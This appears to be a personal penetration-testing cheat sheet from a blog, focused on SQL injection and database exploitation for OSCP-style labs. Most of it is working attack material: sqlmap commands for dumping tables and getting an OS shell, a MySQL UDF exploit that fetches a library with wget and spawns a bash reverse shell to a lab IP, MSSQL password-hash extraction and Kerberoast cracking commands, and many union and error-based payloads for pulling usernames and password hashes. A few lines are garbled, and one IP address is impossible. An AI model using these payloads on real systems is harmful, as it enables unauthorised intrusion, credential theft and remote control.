Uncategorized

SQL & SQL Injection

All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

CONNECT TO SQL SERVER

sqsh -S <IP> -U <Username> -P <Password> -D <Database>
mysql -u user -p password
mysql -u user -p password -h host

QUICKLY SAVE A QUERY THROUGH BURPSUITE

…NOTE… this is not usable on an OSCP exam

http://ip.com/whatever.php?id=1
INTERCEPT WITH BURP - NO FORWARD
RIGHT CLICK AND HIT 'SAVE ITEM'
USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner (takes a while to run)
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometime it shows more)
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10
RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10
TRY A SYSTEM SHELL
sqlmap -r mssql --os-shell --threads 10
os-shell> whoami

MYSQL ENUMERATION

…requires credentials

mysql --host=127.0.0.1 --port=13306 --user=wp -p
MariaDB [(none)]> SHOW Grants;
MariaDB [(none)]> show varping iables;

MYSQL EXPLOIT

… creates function within mysql, then executes command using root

# GRAB THE EXPLOIT TO COMPILE
git clone https://github.com/1N3/PrivEsc.git
gcc -m32 -g -c raptor_udf2.c                                                      
gcc -m32 -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
ls
lib_mysqludf_sys_0.0.3.tar.gz  raptor_udf2.c  raptor_udf2.o  raptor_udf2.so  raptor_udf.c

# ON TARGET MAKE A DIRECTORY /tmp/tmp
mkdir /tmp/tmp
cd /tmp/tmp
wget http://192.168.119.299:443/raptor_udf2.so
cp raptor_udf2.so raptor.so

mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/tmp/raptor.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+-----------+----------+
| name      | ret | dl        | type     |
+-----------+-----+-----------+----------+
| do_system |   2 | raptor.so | function | 
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)

mysql> select do_system('bash -i >& /dev/tcp/192.168.119.299/80 0>&1');

CREDENTIAL LOCATIONS

… may be able to find files with credentials
… here are a couple common ones

# PLAIN TEXT DIRECTORY STRUCTURE
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Template Data\master.mdf
# OLDER NT DIRECTORY STRUCTURE
C:\\PROGRA~1\\MICROS~2\\MSSQL1~1.SQL\\MSSQL\\Binn\\Templates\\master.mdf
# SAME OLDER STRUCTURE
PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf

# POWERSHELL - RETRIEVE HASHES
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
import-module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\admin\Desktop\master.mdf"
# IF THE FILE IS IN USE, ONLY BACKUPS CAN BE USED FOR THIS
# HASHCAT MODULE
-m 1731
# CREATE HASHCAT READABLE HASH
Invoke-Kerberoast -outputformat hashcat | fl
hashcat -m 13100

SQL INJECTION QUERIES

… these are just a few common ones
here and here and here are more (just google it)

# HAD TO FIND THE NUMBER OF COLUMNS
# FIND WHICH COULD BE USED FOR INJECTION

# ORACLE
# VERSION
admin' or 1=1 union select (select banner from v$version where rownum=1),null,null from dual--
# DB NAME
admin' or 1=1 union select global_name,null,null from global_name--
# TABLE NAME
admin' or 1=1 union select table_name,null,null from all_tables--
# COLUMNS
admin' or 1=1 union select column_name,null,null from all_tab_columns where table_name='user_table'--
# LOOT
admin' or 1=1 union SELECT username FROM all_users--
admin' or 1=1 union SELECT username,null,null FROM all_users--
admin' or 1=1 union SELECT name FROM sys.user$--
admin' or 1=1 union SELECT column_name FROM all_tab_columns WHERE table_name = WEB_ADMINS--
admin' or 1=1 union SELECT column_name,null,null FROM all_tab_columns WHERE table_name = 'WEB_ADMINS'--
admin' or 1=1 union SELECT PASSWORD,null,null FROM WEB_ADMINS--
# USED TWO COLUMNS TO SEE USER / HASH
admin' or 1=1 union SELECT PASSWORD,ADMIN_NAME,null FROM WEB_ADMINS--

# MSSQL
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

# MONGODB
condition=aaa';shellcode=unescape...
db.my_collection.find({'$where':'shellcode=unescape....
# THIS GOT REDICULOUS... NEED TO LEARN MORE

# MSSQL (REDICULOUS!)
# syntax is [server].[database].[schema].[table]
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(select+top+1+username+from+users)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

SQL INJECTION BASIC STRATEGY EXPLAINED

this is the reference for may of the commands below

# THE ',convert(int,(  )))-- IS USED AS A CLIPBOARD... PUT INQUIRY INSIDE

# FIND DATABASE NAMES
convert(int,db_name())--

# OBTAIN TABLE NAMES
select+top+1+table_name+from+information_schema.tables
',convert(int,(  )))--

# LOOK FOR SECOND TABLE BASE OFF OF PREVIOUS RESULTS
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')
',convert(int,(  )))--

# AND FOR ANOTHER TABLE BASED OFF OF PREVIOUS RESULTS... TILL THERE ARE NO MORE
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')
',convert(int,(  )))--
RECORD DELETED = NO MORE DATABASES

# NEXT TARGET COLUMNS
select+top+1+column_name+from+information_schema.columns+where+table_name='users'
',convert(int,(  )))--

# SECOND COLUMN OF THE TABLE WE FOUND
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')
',convert(int,(  )))--

# CONTINUE UNTIL RECORD HAS BEEN DELETED = LAST COLUMN
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')
',convert(int,(  )))--

# GETTING THE DATA - SAME METHOD USING TABLE AND COLUMN
select+top+1+uname+from+users
',convert(int,(  )))--

# SECOND VALUE AND SO ON
select+top+1+uname+from+users+where+uname+not+in+('admin')
',convert(int,(  )))--

# THIRD VALUE AND SO ON TILL RECORD DELETED = LAST VALUE
select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')
',convert(int,(  )))--
Scroll to top